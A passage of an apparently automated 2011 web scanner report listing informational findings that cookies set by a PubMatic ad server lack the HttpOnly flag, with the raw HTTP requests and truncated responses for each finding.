P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:10 GMT
Content-Length: 1306
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:10 GMT; path=/
Set-Cookie: pubfreq_27331_22455_2082359010=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:10 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.188. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A46&ranreq=0.014046431286260486&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414207&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=76094761&rk1=21428777&rk2=1316239726.597&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:20 GMT
Content-Length: 1176
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:07:20 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1804611076=776-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:47:20 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC2VwAAAAAAAAAA
...[SNIP]...

12.189. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=661&prevkadIds=22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame22733027331&kltstamp=2011-8-17%201%3A8%3A24&ranreq=0.6084608566015959&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:57 GMT
Content-Length: 1221
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:57 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1066863646=136-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:57 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame22733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.190. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A43&ranreq=0.6440964669454843&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=54474395&rk1=24255064&rk2=1316239663.519&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:17 GMT
Content-Length: 1310
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:17 GMT; path=/
Set-Cookie: pubfreq_27331_22455_882181560=661-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:17 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.191. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22454&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A34&ranreq=0.4114131892565638&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Right,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fnational%2Fremembering_911%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:08 GMT
Content-Length: 1862
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:08 GMT; path=/
Set-Cookie: pubfreq_27331_22454_1191711468=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:08 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:04:08 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.192. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23101&kadwidth=160&kadheight=600&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A22&ranreq=0.9928095163777471&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Finside_track%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:55 GMT
Content-Length: 1863
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:55 GMT; path=/
Set-Cookie: pubfreq_27331_23101_488413314=1053-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:55 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Sun, 18-Sep-2011 01:06:55 GMT; path=/

document.write('<div id="http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=w
...[SNIP]...

12.193. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A5%3A35&ranreq=0.421427555847913&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38484872&rk1=72091245&rk2=1316239534.984&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:04:09 GMT
Content-Length: 1831
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:04:09 GMT; path=/
Set-Cookie: _curtime=1316221449; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:14:09 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1536825855=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:44:09 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

12.194. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23103&kadwidth=728&kadheight=90&kadNetwork=1053&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A7%3A3&ranreq=0.09347362210974097&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=30568955&rk1=84725501&rk2=1316239623.514&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PUBMDCID=1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:05:37 GMT
Content-Length: 1837
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:05:37 GMT; path=/
Set-Cookie: _curtime=1316221537; domain=pubmatic.com; expires=Sat, 17-Sep-2011 02:15:37 GMT; path=/
Set-Cookie: pubfreq_27331_23103_1564788760=243-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:45:37 GMT; path=/

document.writeln('<'+'script type="text/javascript"> document.writeln(\'<iframe width="728" scrolling="no" height="90" frameborder="0" name="iframe0" allowtransparency="true" marginheight="0" marginwi
...[SNIP]...

12.195. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=22455&kadwidth=728&kadheight=90&kadNetwork=136&prevkadIds=22455_22455&kbgColor=&ktextColor=&klinkColor=&pageURL=http://ad.afy11.net/ad&frameName=http_ad_afy11_netadkomli_ads_frame32733027331&kltstamp=2011-8-17%201%3A8%3A24&ranreq=0.10853273188695312&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; KTPCACOOKIE=YES; PUBMDCID=1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:06:58 GMT
Content-Length: 1205
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Sun, 16-Sep-2012 01:06:58 GMT; path=/
Set-Cookie: pubfreq_27331_22455_1402739245=139-1; domain=pubmatic.com; expires=Sat, 17-Sep-2011 01:46:58 GMT; path=/

document.write('<div id="http_ad_afy11_netadkomli_ads_frame32733027331" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=wmoAAMNqAAC3VwAAAAAAAAAA
...[SNIP]...

12.196. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27330&siteId=27331&adId=23102&kadwidth=300&kadheight=250&kbgColor=&ktextColor=&klinkColor=&pageURL=http://bostonherald.com/includes/processAds.bg&frameName=http_bostonherald_comincludesprocessAds_bgkomli_ads_frame12733027331&kltstamp=2011-8-17%201%3A8%3A42&ranreq=0.620290007442236&timezone=-5&screenResolution=1920x1200&inIframe=1 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
